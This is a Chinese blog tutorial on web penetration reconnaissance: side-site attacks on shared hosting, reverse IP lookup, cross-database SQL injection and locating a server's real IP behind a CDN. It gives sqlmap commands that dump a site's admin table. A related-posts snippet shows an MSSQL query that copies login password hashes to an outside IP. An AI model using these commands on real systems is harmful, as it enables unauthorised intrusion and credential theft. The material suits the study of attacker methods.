旁注与CDN

最新推荐文章于 2024-02-06 17:25:34 发布
最新推荐文章于 2024-02-06 17:25:34 发布
阅读量430 收藏 4
点赞数 1
文章标签: 旁注与CDN

旁注、目录越权、跨库、CDN绕过讲解

1 旁注

安全圈里,有一个经典的名字,叫做”旁注“。

那么,旁注是什么呢?

简单来说,旁注,从其字面含义来理解,意为:从旁注入。旁注,我们可以理解为在同一服务器上的多个站点。在进行web站点架设的时候,很多时候由于成本等方面的原因,我们会在一个服务器上架设多个web站点,然后通过主机头对网站进行区分,使得可以通过不同域名访问到不同的web站点。

拿IIS6.0举例来说,在架设web站点时,可以通过指定站点根目录,而后在主机头设置添加相应信息用来实现多个web站点,在同一端口下可正常访问。在公网上面很多服务器都是直接在某一盘符下面,设置为web站点的绝对目录,然后在目录下建立对应域名的文件夹用以区分。一台服务器上面可能存在上百个站点。

 

 

2 IP逆向查询

         可通过ping 域名获取其相关IP地址,之后通过IP地址反查获取其旁注的域名。

如下图所示,为手动查询某一个IP地址上的旁站信息(与IP反查相似):

 

通过以下网址对IP进行查询,可得出此IP绑定的域名地址有多少个:

http://tool.chinaz.com/Same/

http://dns.aizhan.com/

http://www.11best.com/ip/

        

3 目录越权

 

 

4 SQL跨库查询

在我们进行sql注入的时候,经常会读出许多库。导致我们还需要在sqlmap里面使用“—current-代表”进行判断当前库是哪个。

Mysql的root、mssql的sa、oracle的sys 分别是其数据库中权限最大的账户。

一般情况下,各个数据库对于其用户权限分别对应相关权限。通常在注入mssql的时候会看到所有的库名,但是读表却只能读当前库的表名。这个时候你的权限一般为dbowner 的权限,既数据库所有者的权限。换句话说,你只可以对当前库进行增删改查等操作。

跨库查询的第一要求就是要有权限,或者说,权限可以提升。否则只能对当前库进行操作,其他库甚至连读权限都可能没有。

n  比如说,mysql的root权限最高,所有的库对于root来说增删改查任意操作皆可执行。在windows系统中,安装的mysql一般具有system权限,也就是全盘可读。提权的时候如果拿到了root那么提权就会比较方便一些。

n  在linux系统中,mysql运行时一般是以mysql用户的权限来运行,相比较于windows,linux系统上的mysql更难利用,原因是linux的权限设置比较严格,在正常情况下,mysql只具有mysql用户的权限,相比较与windows下的mysql权限要低很多。

 

注意:在目前来看,跨库查询是指由于权限设置不严格,导致普通帐号被授予过高的权限,从而使得其可以对其他的数据库进行操作。比如,在mysql中,informatin_schema

这个表默认只有root有权限进行操作。但是如果一个普通账户权限过高后,他便可以对该数据库进行操作,从而影响整个mysql数据库的运行。

 

--current-db  查看当前站点使用那个数据库

--dbs

-D phpcms --tables查看phpcms数据库里面的内容

--is-dba -v 1 查看是否是数据库权限

-D phpcms --T admin --dump 对phpcms库里面的admin表进行拖库

 

6 CDN绕过

CDN,百度百科的解释为内容分发网络。我们可以这么理解:互联网是非常大的,而我的站点在架设的时候全世界的人都有可能来访问,但是由于互联网非常大,如果想访问我们站点的用户与我们的站点延迟非常大,导致网站首页打开都非常慢,这会直接影响到用户的访问体验,并且因此而流失掉的潜在客户是非常不值得的。

以上问题在互联网发展史中是真实存在的,是需要解决的,于是就出现了CDN,我们可以把CDN看作是我们web站点的镜像服务器,我们在站点架设好之后,只需要将DNS指向修改一下,就可以将所有用户的访问指向到CDN。CDN一般在全国各地都有,提高了用户访问速度;并且由于攻击者没有真实IP地址,哪怕攻陷了CDN也不会对我们的服务器有任何影响,所以CDN解决了访问速度以及提高安全性这两个问题。

在我们进行渗透的时候,经常会会遇到CDN,通过ping 域名即可判断出是否是CDN。

         那么,既然有了CDN,那我们就要放弃吗?当然不会,我们要想办法找到CDN后面的真实服务器IP地址。下面介绍几个找到服务器真实IP地址的方法:

n  大型站点一般除了www的子域之外还会有mail、oa、crm等其他二级域名。我们这个时候可以在google搜索下site:XXX.com –www 或者site:xxx.com mail 来搜索其他的二级域名。通过其他的二级域名DNS解析所对应的IP地址来判断其拥有的IP地址段。一般情况下, www有可能是托管在其他地方但是mail服务器一般是企业自行运营维护。

在获得其IP地址段之后,可以在浏览器地址栏通过直接访问IP地址或是使用nmap来进行整段扫描确认其真实IP地址。

n  通过多地ping来确认其真实IP地址;web站点架设的目的就是提供给人访问,有时候考虑到访问速度的问题会使用CDN提高访问速度,对于这种站点,可通过多地ping的方式,来判断其web服务器的真实IP地址

多地pign工具:

http://ping.chinaz.com/

 

绕过CDN机制

 

1、工具检测网站是否启用CDN

2、通过phpinfo、源码泄露、错误输出

3、子域名

4、观察IP变化(http://toolbar.netcraft.com/site_report?url=www.ichunqiu.com)

 
Wh0ale
关注
红队攻防渗透技术实战流程:红队目标信息收集之目标域名CDN绕过
HACKONE的博客
03-24 153
CDN的全称是Content Delivery Network(内容分发网络),通过在网络各处的加速节点服务器来为网站抵挡恶意流量,把正常流量进行转发。用简单点的话来说,CDN一般有三个作用:1.跨运营商加速:我们自己的网站常常只属于一个运营商(比如:电信),而加速节点遍布每家运营商,于是和网站不同运营商(比如:联通)的用户访问起来就不会那么慢了。
Google / Baidu 黑客搜索引擎语法详细记录
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-08 2334
下面就来介绍一些常用的语法: intext: 这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含”动网”的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含”安全天使”的网页.同理allintitle:也同intitle类似. cache: 搜索
旁注、目录越权、跨库、CDN绕过
songbai220
12-11 511
旁注、目录越权、跨库、CDN绕过 旁注原理 站点假设没有漏洞,我们可以通过共计服务器上的其他任意站点,这个就是旁注 IP逆向查询 可以通过ping域名获取相关IP地址,之后通过IP地址反查获取其旁注的域名 http://tool.chinaz.com/same http://dns.aizhan.com http:/www.11best.com/ip 目录越权 运维人员使用了同一个中间件用户而造成的目录越权,同时中间件用户权限过高也可以造成目录越权 升级中间件,对多个站点分别设置不同的用户,取消父目录
旁注,跨库,CDN绕过之——旁注
温柔小薛的博客
04-16 469
旁注 旁注是什么呢? 简单来说,旁注,从其字面含义来理解,意为:从旁注入。旁注,我们可以理解为在同一服务器上的多个站点。在进行web站点架设的时候,很多时候由于成本等方面的原因,我们会在一个服务器上架设多个web站点,然后通过主机头对网站进行区分,使得可以通过不同域名访问到不同的web站点。 拿IIS6.0举例来说,在架设web站点时,可以通过指定站点根目录,而后在主机头设置添加相应信息用来实现多...
旁注攻击和CDN,绕过cdn真实IP
Z_Grant的博客
10-18 1618
文章目录一,旁注攻击(1)定义(2)经常出现的环境1.1 IP逆向查询1.2 数据库跨库查询1.3目录越权二,CDN2.1 简介2.2 如何绕过CDN真实IP 目标站点固若金汤,无从下手????,试试旁注! 一,旁注攻击 (1)定义 攻击者通过同一服务器搭建的其他其他站点渗透到目标网站,从而获取目标站点的权限。 (2)经常出现的环境 常常发生在中小型站点,因为直接购买服务器昂贵。对个人博客,小型...
linux 详解邮件服务器
m0_62339284的博客
04-07 6915
邮件服务(postfix+dovecot+ssl)
TransactionalEventListener 实现事务消息【SpringBoot + RabbitMQ + MybatisPlus】
qq_34125999的博客
12-03 1388
1 背景 当时有个业务关系到多表操作,并且发送多条MQ。发现事务回滚,消息却发出去了。 2 TransactionalEventListener 可以监听事务的状态来执行某些操作。 3 实战 3.1 环境 1 mysql 2 rabbitmq 3 spring boot 3.2 数据库 CREATE TABLE `t_department` ( `id` int(11) NOT NULL AUTO_INCREMENT, `department_name` varchar(50) DEFAULT
挖洞经验--绕过cdn寻找真实ip
Vdieoo的博客
10-30 1688
判断目标死否是软柿子,是否上云是否有CDN加速 cdn主要用于加速,反向代理主要解决安全 CDN服务器里的缓存服务及内容提供商的源服务,所以我们访问网站时连接的是某个离自己最近的 CDN服务器,所以我们ping到的服务器IP就是此CDN服务器的IP,所以在不同的地方ping出来的IP都 不一样,这样也完美的的隐藏真实服务器的IP地址,当你旁注的时候就会无法找到正真的旁站,旁注与C段基本无用 只能从网站环境入手 云防护的工作原理:厂家基本都是将用户的域名解析指向到自己的云防...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 005-网络安全应急技术与实践(黑客入侵技术)
最新发布
时光隧道
02-06 7万+
WHOIS查询是一种用于确定域名或IP地址的所有者和注册信息的公共数据库查询服务。使用WHOIS查询,您可以查找域名的注册商、注册日期、到期日期、域名所有者的联系信息以及域名服务器等相关信息。WHOIS协议通常使用TCP端口43进行通信。请注意,由于WHOIS是公开数据库,因此某些敏感信息(例如个人联系信息)可能会被隐藏或保护,以保护个人隐私。
谷歌师兄的leetcode刷题笔记-34bcc.github.io:34bcc.github.io
06-30
CDN 提供服务时,您会看到典型的DOMContentLoaded时间远低于 100 毫秒(使用更精简的样式表时,请参见下文)。 对于较慢的连接,好处最为明显。 在 Chrome 中的常规 - 2G节流设置中,演示页面仍然管理低于 500 毫秒...
CDN解析记录查询工具源码
01-31
做了很多年的伸手党,去年做一个项目需要收集域名的信息,其中就要查询CDN解析记录,然后就有了这个工具,可以查询指定域名一定时间的CDN缓存,源代码使用mono环境编写的C#,可以直接逆向,我就不贴代码了。E文很烂,主要是防止乱码,凑合看吧。 以下是执行结果 =================================================== Cdn2B v1.0.0 By 4tom. 2015.08.12 Copyright(c)2015 MYTH-CN =================================================== [+] set targetURL: www.csdn.com [+] start search. [=] get web data. 03.700 seconds [+] get web data finish. [===================Network=======================] Site http://www.csdn.com Domain csdn.com IP Address 101.201.172.229 Domain registrar unknown Organisation unknown Netblock Owner Aliyun Computing Co., LTD Nameserver f1g1ns1.dnspod.net DNS admin freednsadmin@dnspod.com Reverse DNS unknown Nameserver organisation DNS Security Extensions unknown [===============Hosting History===================] Netblock owner Aliyun Computing Co., LTD 5F, Builing D, the West Lake International Plaza of ST No.391 Wener Road, Hangzhou, Zhejiang, China, 310099 IP address 101.201.172.229 OS Linux Web server openresty Last seen 9-Dec-2015 Netblock owner Beijing Capitalonline Data Service Co.,LTD Rm.16c,Bldg.2A,Jinyuan times business Centre, No.2,Landianchang-East Rd., Haidian District,Beijing
LINUX下邮件服务器
weixin_33676492的博客
12-17 2700
邮件服务器搭建 ############分割线 编译安装Mysql,启动控制Mysql########## 1、卸载已安装的mysql的RPM包 编译安装mysql前,首先查看系统中是否已安装mysql服务器软件: [root@server01 /]# rpm -qa | grep mysql [root@server01 /]# rpm -e mysql-s...
CDN前端开源项目地址
smile的博客
05-22 622
https://www.bootcdn.cn/
SQL注射总结(7)
净心编程
12-29 1281
3、 复制哈西表(HASH)  这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;, select * from _sysxlogins) s
找到堡垒后的目标--逆向CDN的各种方式总结(干货,附解决方案)
大方子
08-18 739
国内民间中小型网站有常见的"360网站卫士","百度云加速","云盾","安全宝"等 和国外这类CDN+云WAF的始祖"cloudflare" 以及 我国各大部级单位网站和各类大型公司所使用的cdn 例如蓝汛,网宿等等。CDN的存在导致渗透测试时无法对web服务器进行直接攻击。攻击扫描等也会被cdn自带的waf拦截。是任何hacker在渗透时的一大阻碍(个别人会直接攻击篡改CDN,这时CDN反而成...
mysql root提权服务器_旁注时MYSQL+root权限提权******服务器
weixin_35682020的博客
01-19 190
1.得到webshell或者能远程连接服务器的2.上传一个3.用得到的root密码填入到这里说几个细节,确定你要***的服务器系统类型,一般是windows 2000或者2003吧?2000导出到winnt,2003导出到windows目录,或者什么都不填写,直接在导出路径那里填写4.是否导出成功?如果没有导出成功,把路径换一下,换成c:\\windows\\system32\\udf.dll,也...
截取邮箱后缀名,拼接访问邮箱地址
yiyingcsdn的博客
08-11 2583
截取邮箱地址,访问邮箱
EvtEng.exe
ProcessInfo的专栏
12-03 685
  进程知识库 EvtEng - EvtEng.exe - 进程信息进程文件: EvtEng 或者 EvtEng.exe进程名称: Intel EvtEng Module  描述:EvtEng.exe是EvtEng相关模块,用于支持Intel无线网络连接硬件。 出品者: Intel属于
旁注原理
weixin_33797791的博客
03-11 422
  旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。   介绍 旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的...
latex中如何设旁注
07-09
在LaTeX中,可以使用脚注命令来创建旁注以下是创建旁注的步骤: 1. 在导言区或文档开头添加...注意:旁注通常会出现在页面的边缘,而不是与正文对齐。如果你需要更高级的旁注排版,可以参考相关的LaTeX包或模板。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值